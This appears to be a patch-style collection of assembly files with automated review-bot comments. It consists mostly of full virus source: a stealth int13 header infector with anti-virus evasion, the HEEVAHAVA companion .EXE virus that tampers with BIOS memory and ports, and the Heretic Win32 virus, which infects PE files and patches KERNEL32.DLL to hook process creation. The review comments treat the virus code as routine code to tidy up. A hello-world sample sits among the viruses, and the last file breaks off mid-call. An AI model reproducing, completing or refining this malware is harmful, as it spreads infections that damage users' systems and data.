mov ax,04a10 ;SMARTDRV STATUS function
push ax ;save it for later use
mov dl,02 ;turn off drive's read buffer
int 02f ;do it
pop ax ;restore ax
mov dl,04 ;turn off drive's write buffer
int 02f ;do it
dec bp ;decrement drive number
jns kill_cache ;if drive number >=0, repeat process
push cs
pop ds ;set ds=cs
mov ax,03d00 ;open file w/handle
mov dx,offset filename-header_offset ;point to filename
int 021 ;do it
jc exit_header ;if flag=fail, exit
mov bx,ax ;save handle
mov ah,03f ;read file w/handle
mov ch,02 ;read 200h bytes (header sector)
mov dh,02 ;point to buffer area beyond virus
int 021 ;do it (infect SMARTDRV.EXE header)
mov ah,03e ;close file w/handle
int 021 ;do it
exit_header:
mov ah,04c ;terminate with return code
int 021 ;do it
filename: db 'C:\DOS\SMARTDRV.EXE',0 ;file to initially infect
;-----------------------------------------------------------------------------
; Int13 - On any read or write, checks sector for .EXE header characteristic.
; Checks for word found in header of SETVER.EXE to prevent infection and
; resulting problems (lockup) when an infected SETVER is loaded from default
; CONFIG.SYS. If sector is being read, checks for infection then checks for
; presence of A-V monitor before infecting. If sector is being written, only
; checks for SETVER header, since stealth on prior int13 would hide previous
; infection and since any A-V monitor would expect a write action. In both
; read or write cases, sector is restored to appear identical to pre-infection
; before buffer containing .EXE header is presented to calling program. Name
; of virus stored in area of interrupt table used by TBDriver vectors in
; order to prevent system crash if TBDriver is loaded after virus is resident.
;-----------------------------------------------------------------------------
int13:
push cx ;preserve registers
push si
push di
push ds
push es
pop ds ;set ds=es
cmp ah,03 ;write operation?
je write ;if so, jump to write routine
cmp ah,02 ;read operation?
jne chain_old_int13 ;if not, exit
read:
pushf
call far cs:[offset old13+res_offset] ;call int13 (read sector)
jc exit_int13 ;if flag=fail, exit
mov si,'ZM' ;bytes indicating .EXE header
cmp [bx],si ;.EXE header?
jne exit_fail ;if not, exit
cmp [bx+014],setver_tag ;is this SETVER's header?
je exit_fail ;if so, exit
cmp [bx+0a0],infect_tag ;already infected?
je disinfect ;if so, jump to stealth routine
push ds ;preserve ds
xor di,di ;set di to virus destination
mov ds,di ;set ds to point to INT vector table
cmp byte ptr [040*4+3],0f0 ;int40 still pointing at ROM?
pop ds ;restore ds
jb exit_fail ;if not pointing at ROM, A-V monitor
; present, so exit
push cx ;preserve cx
call infect ;infect header in buffer
pop cx ;restore cx
jc exit_fail ;if flag=fail, exit
mov ax,0301 ;write infected header buffer
pushf
call far cs:[offset old13+res_offset] ;do it (call original int13)
disinfect:
lea si,[bx+offset old_header-com_offset] ;set source for code
lea di,[bx+06] ;set destination
mov cx,old_code_length ;set length of old code to restore
cld ;move direction=forward
rep movsb ;restore original code to header
xor al,al ;set al=0
mov cx,viruslength+old_code_length ;set # bytes to overwrite
lea di,[bx+0a0] ;set destination for writes
rep stosb ;overwrite viral code with zeros
exit_fail:
clc ;clear carry to hide any I/O errors
exit_int13:
pop ds ;restore registers
pop di
pop si
pop cx
retf 02 ;return to calling program
tbdriver_vector_area:
db '=HeaderBug=' ;space filler for TBDriver vector
write:
mov si,'ZM' ;bytes indicating .EXE header
cmp [bx],si ;.EXE header?
jne chain_old_int13 ;if not, exit
cmp [bx+014],setver_tag ;is this SETVER's header?
je chain_old_int13 ;if so, exit
push ax ;preserve ax
call infect ;infect header in buffer
pop ax ;restore ax
chain_old_int13:
pop ds ;restore registers
pop di
pop si
pop cx
db 0ea ;"jump far"
old13:
dw 02 dup ? ; to address of orig. int13 routine
infect:
lea si,[bx+0a0] ;set si=source offset for virus code
zero_test:
mov cx,viruslength+old_code_length ;set scan count to virus length
cld ;set direction of scan=forward
test_byte:
lodsb ;load a byte from area to be scanned
or al,al ;check for zero
loopz test_byte ;if zero, check next byte
or cx,cx ;counted down to zero w/o prior exit?
jz infect_OK ;if so, area is clear to infect
stc ;set "clear-to-infect" flag
ret ;return to calling routine
infect_OK:
inc ah ;increment ah
jz exit_infect ;true if calling routine=header_entry
mov cl,old_code_length ;length of old header code to preserve
lea si,[bx+06] ;set source for old code
lea di,[bx+offset old_header-com_offset] ;set storage destination
rep movsb ;store old code in virus
xor ax,ax ;set ax=0
lea di,[bx+014] ;set destination to cs:ip location
stosw ;set cs:ip values in header to 0:0
stosw ; by storing zeros in their locations
lea di,[bx+06] ;set destination to # of reloc. items
stosw ;set # of relocation items to zero
mov al,0a ;set header size value to 0ah to
stosw ; place entry point at start of virus
mov si,start_offset ;set si=start offset of virus
lea di,[bx+0a0] ;set di=destination offset in buffer
move_it:
push ds ;preserve ds
push cs
pop ds ;set ds=cs
mov cx,viruslength ;set cx move count to length of virus
cld ;set direction of move to forward
rep movsb ;move virus to header in buffer
pop ds ;restore ds
exit_infect:
clc ;clear flag to hide any I/O errors
ret ;return to calling routine
old_header:
db old_code_length dup ? ;storage area for original header
; contents
dummy_bytes:
db 0220a dup ? ;dummy bytes used to increase dropper
; length to avoid detection by f-prot
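Review bot: The comment on `stc` in `zero_test` reads `;set "clear-to-infect" flag`, but carry is the failure signal here: the callers bail out on it with `jc exit_header` and `jc exit_fail`, and the success paths end in `clc`. It should read `;carry set = area not empty, do not infect`. The header's "no harmful payload" line also sits oddly with code that switches off SMARTDRV read and write buffering in `kill_cache` and clears carry at `exit_fail` so the caller never sees an I/O error; I would reword it to list those effects. The recognisable header state after infection (`infect_tag` at offset 0A0h, CS:IP zeroed, relocation count 0, header size 0Ah) is spread over inline comments and would be more useful collected in the notes block.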
@@ -0,0 +1,296 @@
; HEEVAHAV.ASM -- HEEVAHAVA VIRUS
; Created with Nowhere Man's Virus Creation Laboratory v1.00/TASM
; Written by URNST KOUCH
; This is a spawning virus I decided to take to the limit,
; to step on the accelerator of the VCL, so to speak.
; HEEVAHAVA virus is a 'companion' .EXE infector which will attempt
; to infect almost 20 files anywhere on the disk every run. It will mess
; with low RAM, beep the speaker, disable COM port 1, entangle LPT1 and LPT2,
; nullify print screen and finally, when the disk is completely saturated
; with HEEVAHAVA virus it will display the msg, "Only heeva-hava's get stuck
; with the HEEVAHAVA virus!" Note: a 'heevahava' is a Pennsylvania
; Dutch pejorative. Colloquially, it was the name given to the farmhand
; given the job of holding the bull's pecker while semen was collected.
virus_type equ 2 ; Spawning Virus
is_encrypted equ 0 ; We're not encrypted
tsr_virus equ 0 ; We're not TSR
code segment byte public
assume cs:code,ds:code,es:code,ss:code
org 0100h
start label near
main proc near
mov ah,04Ah ; DOS resize memory function
mov bx,[finish - start / 0282h] ; BX holds # of para.
int 21h
mov sp,(finish - start) + 01100h ; Change top of stack
mov si,offset spawn_name ; SI points to true filename
int 02Eh ; DOS execution back-door
push ax ; Save return value for later
mov ax,cs ; AX holds code segment
mov ds,ax ; Restore data segment
mov es,ax ; Restore extra segment
mov cx,0013h ; Do 19 infections
search_loop: push cx ; Save CX
call search_files ; Find and infect a file
pop cx ; Restore CX
loop search_loop ; Repeat until CX is 0
mov dx,0064h ; First argument is 100
push es ; Save ES
mov ax,040h ; Set extra segment to 040h
mov es,ax ; (ROM BIOS)
mov word ptr es:[013h],dx ; Store new RAM ammount
pop es ; Restore ES
mov cx,0005h ; First argument is 5
jcxz beep_end ; Exit if there are no beeps
mov ax,0E07h ; BIOS display char., BEL
beep_loop: int 010h ; Beep
loop beep_loop ; Beep until --CX = 0
beep_end:
push es ; Save ES
mov ax,050h ; Set the extra segement to
mov es,ax ; the BIOS area
mov byte ptr [0000h],1 ; Set print screen flag to
pop es ; "printing," restore ES
mov si,0001h ; First argument is 1
push es ; Save ES
xor ax,ax ; Set the extra segment to
mov es,ax ; zero (ROM BIOS)
shl si,1 ; Convert to word index
mov word ptr [si + 03FEh],0 ; Zero COM port address
pop es ; Restore ES
mov bx,0001h ; First argument is 1
mov si,0002h ; Second argument is 2
push es ; Save ES
xor ax,ax ; Set the extra segment to
mov es,ax ; zero (ROM BIOS)
shl bx,1 ; Convert to word index
shl si,1 ; Convert to word index
mov ax,word ptr [bx + 0407h]; Zero COM port address
xchg word ptr [si + 0407h],ax; Put first value in second,
mov word ptr [bx + 0407h],ax; and second value in first!
pop es ; Restore ES
call infected_all
or ax,ax ; Did the function return zero?
je strt00 ; If equal, do effect
jmp end00 ; Otherwise skip over it
strt00: mov si,offset data00 ; SI points to data
mov ah,0Eh ; BIOS display char. function
display_loop: lodsb ; Load the next char. into AL
or al,al ; Is the character a null?
je disp_strnend ; If it is, exit
int 010h ; BIOS video interrupt
jmp short display_loop ; Do the next character
disp_strnend:
end00: pop ax ; AL holds return value
mov ah,04Ch ; DOS terminate function
int 021h
main endp
search_files proc near
push bp ; Save BP
mov bp,sp ; BP points to local buffer
sub sp,64 ; Allocate 64 bytes on stack
mov ah,047h ; DOS get current dir function
xor dl,dl ; DL holds drive # (current)
lea si,[bp - 64] ; SI points to 64-byte buffer
int 021h
mov ah,03Bh ; DOS change directory function
mov dx,offset root ; DX points to root directory
int 021h
call traverse ; Start the traversal
mov ah,03Bh ; DOS change directory function
lea dx,[bp - 64] ; DX points to old directory
int 021h
mov sp,bp ; Restore old stack pointer
pop bp ; Restore BP
ret ; Return to caller
root db "\",0 ; Root directory
search_files endp
traverse proc near
push bp ; Save BP
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address
mov bp,sp ; BP points to local buffer
sub sp,128 ; Allocate 128 bytes on stack
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer
int 021h
mov ah,04Eh ; DOS find first function
mov cx,00010000b ; CX holds search attributes
mov dx,offset all_files ; DX points to "*.*"
int 021h
jc leave_traverse ; Leave if no files present
check_dir: cmp byte ptr [bp - 107],16 ; Is the file a directory?
jne another_dir ; If not, try again
cmp byte ptr [bp - 98],'.' ; Did we get a "." or ".."?
je another_dir ;If so, keep going
mov ah,03Bh ; DOS change directory function
lea dx,[bp - 98] ; DX points to new directory
int 021h
call traverse ; Recursively call ourself
pushf ; Save the flags
mov ah,03Bh ; DOS change directory function
mov dx,offset up_dir ; DX points to parent directory
int 021h
popf ; Restore the flags
jnc done_searching ; If we infected then exit
another_dir: mov ah,04Fh ; DOS find next function
int 021h
jnc check_dir ; If found check the file
leave_traverse:
mov dx,offset exe_mask ; DX points to "*.EXE"
call find_files ; Try to infect a file
done_searching: mov sp,bp ; Restore old stack frame
mov ah,01Ah ; DOS set DTA function
pop dx ; Retrieve old DTA address
int 021h
pop bp ; Restore BP
ret ; Return to caller
up_dir db "..",0 ; Parent directory name
all_files db "*.*",0 ; Directories to search for
exe_mask db "*.EXE",0 ; Mask for all .EXE files
traverse endp
find_files proc near
push bp ; Save BP
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address
mov bp,sp ; BP points to local buffer
sub sp,128 ; Allocate 128 bytes on stack
push dx ; Save file mask
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer
int 021h
mov ah,04Eh ; DOS find first file function
mov cx,00100111b ; CX holds all file attributes
pop dx ; Restore file mask
find_a_file: int 021h
jc done_finding ; Exit if no files found
call infect_file ; Infect the file!
jnc done_finding ; Exit if no error
mov ah,04Fh ; DOS find next file function
jmp short find_a_file ; Try finding another file
done_finding: mov sp,bp ; Restore old stack frame
mov ah,01Ah ; DOS set DTA function
pop dx ; Retrieve old DTA address
int 021h
pop bp ; Restore BP
ret ; Return to caller
find_files endp
infect_file proc near
mov ah,02Fh ; DOS get DTA address function
int 021h
mov di,bx ; DI points to the DTA
lea si,[di + 01Eh] ; SI points to file name
mov dx,si ; DX points to file name, too
mov di,offset spawn_name + 1; DI points to new name
xor ah,ah ; AH holds character count
transfer_loop: lodsb ; Load a character
or al,al ; Is it a NULL?
je transfer_end ; If so then leave the loop
inc ah ; Add one to the character count
stosb ; Save the byte in the buffer
jmp short transfer_loop ; Repeat the loop
transfer_end: mov byte ptr [spawn_name],ah; First byte holds char. count
mov byte ptr [di],13 ; Make CR the final character
mov di,dx ; DI points to file name
xor ch,ch ;
mov cl,ah ; CX holds length of filename
mov al,'.' ; AL holds char. to search for
repne scasb ; Search for a dot in the name
mov word ptr [di],'OC' ; Store "CO" as first two bytes
mov byte ptr [di + 2],'M' ; Store "M" to make "COM"
mov byte ptr [set_carry],0 ; Assume we'll fail
mov ax,03D00h ; DOS open file function, r/o
int 021h
jnc infection_done ; File already exists, so leave
mov byte ptr [set_carry],1 ; Success -- the file is OK
mov ah,03Ch ; DOS create file function
mov cx,00100111b ; CX holds file attributes (all)
int 021h
xchg bx,ax ; BX holds file handle
mov ah,040h ; DOS write to file function
mov cx,finish - start ; CX holds virus length
mov dx,offset start ; DX points to start of virus
int 021h
mov ah,03Eh ; DOS close file function
int 021h
infection_done: cmp byte ptr [set_carry],1 ; Set carry flag if failed
ret ; Return to caller
spawn_name db 12,12 dup (?),13 ; Name for next spawn
set_carry db ? ; Set-carry-on-exit flag
infect_file endp
infected_all proc near
#if virus_type eq 0
mov al,byte ptr [di + set_carry]
else
mov al,byte ptr [set_carry] ; AX holds success value
#endif
cbw ; Sign-extend AL into AX
ret ; Return to caller
infected_all endp
data00 db 7,7,7,7,"Only heeva-hava's get stuck with THE HEEVAHAVA virus!",13,10,0
vcl_marker db "HEEVA[VCL]",0 ; VCL creation marker
finish label near
code ends
end main
@@ -0,0 +1,10 @@
; +-------------------------------------------------------------+ ;
; | Sample hello world program for use with the Magic Assembler | ;
; +-------------------------------------------------------------+ ;
mov ah,09
mov dx,offset(hello)
int 21
mov ax,4c00
int 20
hello db 'Hello, world!$'
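Review bot: `mov ax,4c00` has no effect as written, because the following `int 20` ends the program without reading AX. The load only makes sense for the DOS terminate-with-return-code call, so the last instruction was presumably meant to be `int 21`. This assumes bare numbers are hexadecimal in this assembler, which `4c00` implies. A short comment on each interrupt (`; print $-terminated string`, `; exit, return code 0`) would also help a reader new to the sample.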
@@ -0,0 +1,882 @@
;
; SYNOPSIS
;
; Heretic - A Microsoft Windows 32 virus
;
; AUTHOR
;
; Memory Lapse, [NOP]
; formerly of Phalcon/Skism
;
; ABSTRACT
;
; This virus works under all beta versions of Windows 9x, and Windows NT 4.0.
; Under a Win32s environment, the virus will fail since the kernel doesn't
; physically export any useable API. Parsing the import table of the host image
; for GetProcAddress and GetModuleHandle should do the trick.
;
; NOTES
;
; Finally after seven months (including a four month hiatus for university),
; I've finally finished this virus.
;
; Ideally when the kernel is infected, the object the virus extends
; (typically .reloc) should have its flags with IMAGE_SCN_MEM_WRITE turned off.
; This will prevent in-memory patching by antivirus software. Heretic does
; not do this. At least not yet.
;
; Useful reading material: Microsoft Platform, SDK, and DDK Documentation
;
; Greets to priest, h8, lookout, virogen and johnny panic.
;
.386
locals
.model flat, stdcall
.code
.radix 16
include heretic.inc
CRC_POLY equ 0EDB88320
CRC_INIT equ 0FFFFFFFF
crc macro string
crcReg = CRC_INIT
irpc _x,
ctrlByte = '&_x&' xor (crcReg and 0ff)
crcReg = crcReg shr 8
rept 8
ctrlByte = (ctrlByte shr 1) xor (CRC_POLY * (ctrlByte and 1))
endm
crcReg = crcReg xor ctrlByte
endm
dd crcReg
endm
MARKER equ "DOS lives somewhere in time"
org 0
start: push L offset host - start ;location of old entry point
ddOldEntryPoint = dword ptr $ - 4
pushfd ;save state
pushad
call @@delta
@@delta:pop ebp
sub ebp,offset @@delta - start
;thanks vg!
db 81,0edh ;sub ebp,unsignedlong
ddEntryPoint dd 0
add [esp+24],ebp ;return address of host
mov edi,[esp+28] ;get a "random" pointer from stack
and edi,0FFFF0000 ;mask off bottom word
call try
catch: mov esp,[esp+8] ;get pointer to our stack-based
; exception record
jmp finally ;and return to host
try: push dword ptr fs:[0] ;this is our try { } block
mov fs:[0],esp ;create stack-based exception record
.repeat
dec edi ;move back a byte
lea eax,[edi-MAGIC] ;thanks h8!
cmp [edi],eax ;match? then we've found the kernel
.until zero?
mov esi,[eax+exe_str.pe_offset]
add esi,eax ;traverse PE header and find
; Export Data Directory Table
mov ebp,[esi+pe_str.export_tbl]
add ebp,eax ;RVA -> absolute
push eax
push [ebp+edt_str.edt_ord_base]
mov ebx,[ebp+edt_str.edt_ord_rva]
mov edi,[ebp+edt_str.edt_name_rva]
mov ebp,[ebp+edt_str.edt_addr_rva]
add ebx,eax ;adjust ordinal table pointer
add edi,eax ;adjust name pointer table pointer
add ebp,eax ;adjust address pointer table pointer
push ebp ;we save these values onto the stack
push eax ; so we can free up registers
call @@delta
@@delta:pop ebp
sub ebp,offset @@delta
push ebp
; on entry:
; [esp] : delta offset
; [esp+4] : image base
; [esp+8] : address pointer table
; [esp+0c] : ordinal base
; ebx - ordinal table
; esi - pointer to our list of apis
; edi - name pointer table
lea esi,[ebp+name_ptr_api]
mov ecx,1
mov edx,(name_ptr_api_end - name_ptr_api) / 4
top: push edx
push esi
mov esi,[edi] ;calculate absolute offset of
add esi,[esp+0c] ; name pointer (image base)
mov edx,CRC_INIT
lup: lodsb
or al,al ;termination token? then quit
jz chkCRC
xor dl,al
mov al,8
.repeat ;perform CRC-32 on string
shr edx,1 ;thanks jp!
.if carry?
xor edx,CRC_POLY
.endif
dec al
.until zero?
jmp lup
chkCRC: pop esi
push edi
mov ebp,ecx
shl ebp,1 ;convert count into word index
movzx eax,word ptr [ebx+ebp] ;calculate ordinal index
sub eax,[esp+14] ;relative to ordinal base
shl eax,2 ;convert ordinal into dword index
mov ebp,eax
mov edi,[esp+10]
add eax,edi ;calculate offset
mov edi,[edi+ebp] ;RVA of API (dereference said offset)
add edi,[esp+0c] ;convert to absolute offset
mov ebp,[esp+8]
cmp edx,CRC_POLY ;CreateProcessA?
org $ - 4
crc
.if zero?
mov [ebp+lpCreateProcessA],eax ;hook it
mov [ebp+CreateProcessA],edi
.endif
cmp edx,CRC_POLY ;or CreateProcessW?
org $ - 4
crc
.if zero?
mov [ebp+lpCreateProcessW],eax ;hook it
mov [ebp+CreateProcessW],edi
.endif
cmp edx,[esi] ;or an API the virus uses?
.if zero?
mov [esi+(name_ptr_api_end - name_ptr_api)],edi
lodsd ;update pointer
dec dword ptr [esp+4] ;decrement our API count
.endif
pop edi
next: pop edx
add edi,4 ;next API
inc ecx ;remember displacement
or edx,edx ;no more names to parse?
jnz top
pop ebp ;restore delta offset
add esp,0c ;clear stack
call [ebp+GlobalAlloc], \ ;allocate memory for global structure
GMEM_FIXED, \
L size vir_str
mov edi,eax
pop [edi+vir_str.lpKernelBase]
call kernel ;attempt to infect the kernel
call [ebp+GlobalFree], \ ;release global structure resources
edi
finally:pop dword ptr fs:[0] ;this is our finally { } block
pop eax ;trash exception handler address
;low and behold, the stack is restored
popad
popfd
ret
db '[nop] 4 life.. lapse, vg and jp own you! :)'
infect: mov [edi+vir_str.ddError],TRUE ;assume an error occurred
call [ebp+GetFileAttributesA], \
[edi+vir_str.lpFileName]
mov [edi+vir_str.ddFilterAttributes],eax
inc eax
jz exit
call [ebp+SetFileAttributesA], \ ;strip file attributes
[edi+vir_str.lpFileName], \
FILE_ATTRIBUTE_NORMAL
or eax,eax ;error? possibly a r/o disk?
jz exit
call [ebp+CreateFileA], \
[edi+vir_str.lpFileName], \
GENERIC_READ or GENERIC_WRITE, \
FILE_SHARE_NOTSHARED, \
NULL, \
OPEN_EXISTING, \
FILE_ATTRIBUTE_NORMAL, \
NULL
mov [edi+vir_str.hFile],eax ;if we don't get a valid file
inc eax ;descriptor (ie. an invalid handle),
jz exitChmod ;quit processing
lea eax,[edi+vir_str.ddLastWriteTime]
lea ecx,[edi+vir_str.ddLastAccessTime]
lea edx,[edi+vir_str.ddCreationTime]
call [ebp+GetFileTime], \ ;save file timestamps
[edi+vir_str.hFile], \
edx, \
ecx, \
eax
call [ebp+CreateFileMappingA], \ ;create a mmap object
[edi+vir_str.hFile], \
NULL, \
PAGE_READONLY, \
L 0, \
L 0, \
NULL
or eax,eax
jz exitTime
mov [edi+vir_str.hFileMappingObject],eax
call [ebp+MapViewOfFile], \ ;view the file in our address space
[edi+vir_str.hFileMappingObject], \
FILE_MAP_READ, \
L 0, \
L 0, \
L 0
or eax,eax
jz exitCloseMap
mov [edi+lpBaseAddress],eax
cmp word ptr [eax],IMAGE_DOS_SIGNATURE
jnz exitUnmap ;some sort of executable?
mov esi,eax
add esi,[eax+exe_str.pe_offset] ;seek to NT header
push eax
call [ebp+IsBadCodePtr], \ ;can we read the memory at least?
esi ;potentially not a Windows file?
or eax,eax
pop eax
jnz exitUnmap
cmp dword ptr [esi],IMAGE_NT_SIGNATURE
jnz exitUnmap ;PE file?
cmp [esi+pe_str.timestamp],CRC_POLY
org $ - 4
crc MARKER
jz exitUnmap
lea eax,[ebp+infectKernel]
cmp [edi+vir_str.lpInfectMethod],eax;attempting to infect KERNEL32.DLL?
.if !zero?
test [esi+pe_str.flags],IMAGE_FILE_DLL
jnz exitUnmap ;and not a runtime library?
.endif
call getLastObjectTable
mov eax,[ebx+obj_str.obj_psize]
add eax,[ebx+obj_str.obj_poffset]
add eax,(_end - start) ;calculate maximum infected file size
mov ecx,[esi+pe_str.align_file]
call align
mov [edi+vir_str.ddFileSizeInfected],eax
call [ebp+UnmapViewOfFile], \
[edi+vir_str.lpBaseAddress]
call [ebp+CloseHandle], \
[edi+vir_str.hFileMappingObject]
call [ebp+CreateFileMappingA], \ ;reopen and extend mmap file
[edi+vir_str.hFile], \
NULL, \
PAGE_READWRITE, \
L 0, \
[edi+vir_str.ddFileSizeInfected], \
NULL
mov [edi+vir_str.hFileMappingObject],eax
call [ebp+MapViewOfFile], \
[edi+vir_str.hFileMappingObject], \
FILE_MAP_WRITE, \
L 0, \
L 0, \
L 0
mov [edi+vir_str.lpBaseAddress],eax
add eax,[eax+exe_str.pe_offset]
mov esi,eax
call getLastObjectTable
mov eax,[ebx+obj_str.obj_rva] ;set new entry point if an EXE
add eax,[ebx+obj_str.obj_psize] ; or set hooks if kernel32.dll
call [edi+vir_str.lpInfectMethod]
push edi
push esi
mov edi,[edi+vir_str.lpBaseAddress]
add edi,[ebx+obj_str.obj_poffset]
add edi,[ebx+obj_str.obj_psize]
lea esi,[ebp+start]
mov ecx,(_end - start)
cld
rep movsb ;copy virus
pop esi
pop eax
xchg eax,edi
sub eax,[edi+vir_str.lpBaseAddress] ;new psize = old psize + (_end - start)
sub eax,[ebx+obj_str.obj_poffset]
mov ecx,[esi+pe_str.align_file]
call align ;calculate new physical size
mov [ebx+obj_str.obj_psize],eax
mov eax,[ebx+obj_str.obj_vsize]
add eax,(_end - start)
mov ecx,[esi+pe_str.align_obj]
call align ;calculate potential new virtual size
cmp eax,[ebx+obj_str.obj_psize] ;if new physical size > new virtual size
.if carry?
mov eax,[ebx+obj_str.obj_psize] ;then let the virtual size = physical size
.endif
mov [ebx+obj_str.obj_vsize],eax
add eax,[ebx+obj_str.obj_rva]
cmp eax,[esi+pe_str.size_image] ;infected host increased in image size?
.if !carry?
mov [esi+pe_str.size_image],eax
.endif
mov [esi+pe_str.timestamp],CRC_POLY
org $ - 4
crc MARKER
or [ebx+obj_str.obj_flags],IMAGE_SCN_CNT_INITIALIZED_DATA or IMAGE_SCN_MEM_EXECUTE or IMAGE_SCN_MEM_READ or IMAGE_SCN_MEM_WRITE
lea eax,[ebp+szImageHlp]
call [ebp+LoadLibraryA], \ ;load image manipulation library
eax
or eax,eax
.if !zero?
push eax ;(*) argument for FreeLibrary()
lea ecx,[ebp+szChecksumMappedFile]
call [ebp+GetProcAddress], \ ;get address of image checksum api
eax, \
ecx
or eax,eax
.if !zero?
lea ecx,[esi+pe_str.pe_cksum]
lea edx,[edi+vir_str.ddBytes]
call eax, \ ;calculate checksum
[edi+vir_str.lpBaseAddress], \
[edi+vir_str.ddFileSizeInfected], \
edx, \
ecx
.endif
call [ebp+FreeLibrary] ;argument is set at (*)
.endif
mov [edi+vir_str.ddError],FALSE ;no errors!
exitUnmap:
call [ebp+UnmapViewOfFile], \ ;unmap the view
[edi+vir_str.lpBaseAddress]
exitCloseMap:
call [ebp+CloseHandle], \ ;remove mmap from our address space
[edi+vir_str.hFileMappingObject]
exitTime:
lea eax,[edi+vir_str.ddLastWriteTime]
lea ecx,[edi+vir_str.ddLastAccessTime]
lea edx,[edi+vir_str.ddCreationTime]
call [ebp+SetFileTime], \ ;restore file time
[edi+vir_str.hFile], \
edx, \
ecx, \
eax
call [ebp+CloseHandle], \ ;close the file
[edi+vir_str.hFile]
exitChmod:
call [ebp+SetFileAttributesA], \ ;restore file attributes
[edi+vir_str.lpFileName], \
[edi+vir_str.ddFilterAttributes]
exit: ret ;return to caller
kernel: call [ebp+GlobalAlloc], \ ;allocate memory for source buffer
GMEM_FIXED, \
_MAX_PATH
mov [edi+vir_str.lpSrcFile],eax
call [ebp+GetSystemDirectoryA], \ ;store %sysdir% in source buffer
eax, \
_MAX_PATH
call [ebp+GlobalAlloc], \ ;allocate memory for destination buffer
GMEM_FIXED, \
_MAX_PATH
mov [edi+vir_str.lpDstFile],eax
call [ebp+GetWindowsDirectoryA], \ ;store %windir% in destination buffer
eax, \
_MAX_PATH
lea eax,[ebp+szKernel]
call [ebp+lstrcatA], \ ;*lpSrcFile = %sysdir%\kernel32.dll
[edi+vir_str.lpSrcFile], \
eax
lea eax,[ebp+szKernel]
call [ebp+lstrcatA], \ ;*lpDstFile = %windir%\kernel32.dll
[edi+vir_str.lpDstFile], \
eax
call [ebp+CopyFileA], \
[edi+vir_str.lpSrcFile], \ ;%sysdir%\kernel32.dll
[edi+vir_str.lpDstFile], \ ; -> %windir%\kernel32.dll
FALSE
lea eax,[ebp+infectKernel]
mov [edi+lpInfectMethod],eax ;we're trying to infect the kernel
mov eax,[edi+vir_str.lpDstFile]
mov [edi+vir_str.lpFileName],eax
call infect
.if [edi+vir_str.ddError] == FALSE
lea eax,[ebp+szSetupApi]
call [ebp+LoadLibraryA], \
eax
or eax,eax ;if LoadLibrary fails, explicitly write
.if zero? ;to WININIT.INI (Windows 95)
lea eax,[ebp+szWinInitFile] ;delete the original kernel
push eax
push [edi+vir_str.lpSrcFile]
lea eax,[ebp+szKeyName]
push eax
lea eax,[ebp+szAppName]
push eax
call [ebp+WritePrivateProfileStringA]
lea eax,[ebp+szWinInitFile] ;move our patched kernel
push eax
push [edi+vir_str.lpDstFile]
push [edi+vir_str.lpSrcFile]
lea eax,[ebp+szAppName]
push eax
call [ebp+WritePrivateProfileStringA]
.else
push eax ;(*) argument for FreeLibrary
lea ebx,[ebp+szSetupInstallFileExA] ;fetch address of API from this DLL
call [ebp+GetProcAddress], \
eax, \
ebx
or eax,eax
.if !zero?
lea ebx,[edi+ddBytes]
call eax, \ ;move patched kernel
NULL, \ ;NT->delay until next reboot
NULL, \ ; modified MoveFileEx behaviour?
[edi+vir_str.lpDstFile], \ ;98->WININIT.INI
NULL, \
[edi+vir_str.lpSrcFile], \
SP_COPY_SOURCE_ABSOLUTE or SP_COPY_DELETESOURCE, \
NULL, \
NULL, \
ebx
.endif
mov esi,eax
call [ebp+FreeLibrary]
mov eax,esi
.endif
or eax,eax
.if zero?
mov [edi+vir_str.ddError],TRUE
.endif
.endif
.if [edi+vir_str.ddError] == TRUE
call [ebp+DeleteFileA], \ ;delete %windir%\kernel32.dll if
[edi+vir_str.lpFileName] ; an error infecting or moving
.endif
call [ebp+GlobalFree], \ ;deallocate destination buffer
[edi+vir_str.lpDstFile]
call [ebp+GlobalFree], \ ;deallocate source buffer
[edi+vir_str.lpSrcFile]
ret
infectKernel:
xchg eax,ecx
movzx eax,[esi+pe_str.size_NThdr]
add eax,esi
add eax,offset pe_str.majik
mov edx,0
lpCreateProcessA = dword ptr $ - 4
sub edx,[edi+vir_str.lpKernelBase]
@@lup: cmp [eax+obj_str.obj_rva],edx ;was the API in the previous object?
ja @@next
add eax,size obj_str ;next object
jmp @@lup
@@next: sub eax,size obj_str ;seek back to export object
push L offset hookCreateProcessA - start
call trapAPI
mov edx,0
lpCreateProcessW = dword ptr $ - 4
sub edx,[edi+vir_str.lpKernelBase]
push L offset hookCreateProcessW - start
call trapAPI
ret
infectEXE:
mov [ebp+ddEntryPoint],eax
xchg eax,[esi+pe_str.rva_entry]
mov [ebp+ddOldEntryPoint],eax
ret
trapAPI:push ebx
push ecx
mov ebx,[eax+obj_str.obj_poffset]
sub ebx,[eax+obj_str.obj_rva]
add ebx,[edi+vir_str.lpBaseAddress]
add ebx,edx
add ecx,[esp+0c]
mov [ebx],ecx
pop ecx
pop ebx
ret 4
align: xor edx,edx
add eax,ecx
dec eax
div ecx
mul ecx
ret
getLastObjectTable:
movzx eax,[esi+pe_str.num_obj]
cdq
mov ecx,L size obj_str
dec eax
mul ecx
movzx edx,[esi+pe_str.size_NThdr]
add eax,edx
add eax,esi
add eax,offset pe_str.majik ;seek to last object table
xchg eax,ebx
ret
;on entry:
; [esp] : return address to caller
; [esp+4] -> [esp+28] : registers
; [esp+2c] : return address to process
; [esp+34] : commandline
hookInfectUnicode:
call @@delta
@@delta:pop ebp
sub ebp,offset @@delta
mov edi,[esp+34]
call [ebp+WideCharToMultiByte], \ ;find out how many bytes to allocate
CP_ACP, \ ; ANSI code page
L 0, \ ; no composite/unmapped characters
edi, \ ; lpWideCharStr
L -1, \ ; calculate strlen(lpWideCharStr)+1
NULL, \ ; no buffer
L 0, \ ; tell us how many bytes to allocate
NULL, \ ; ignore unmappable characters
NULL ; don't tell us about problems
or eax,eax ;no bytes can be converted?
jz hookInfectError ;then bomb out.
push eax ;(*)
call [ebp+GlobalAlloc], \ ;allocate enough memory for the
GMEM_FIXED, \ ; converted UNICODE string
eax
or eax,eax ;any memory available?
pop ecx ;(*)
jz hookInfectError
mov esi,eax
mov edi,[esp+34]
call [ebp+WideCharToMultiByte], \ ;UNICODE -> ANSI conversion
CP_ACP, \ ; ANSI code page
L 0, \ ; no composite/unmappable characters
edi, \ ; lpWideCharStr
L -1, \ ; calculate strlen(lpWideCharStr)+1
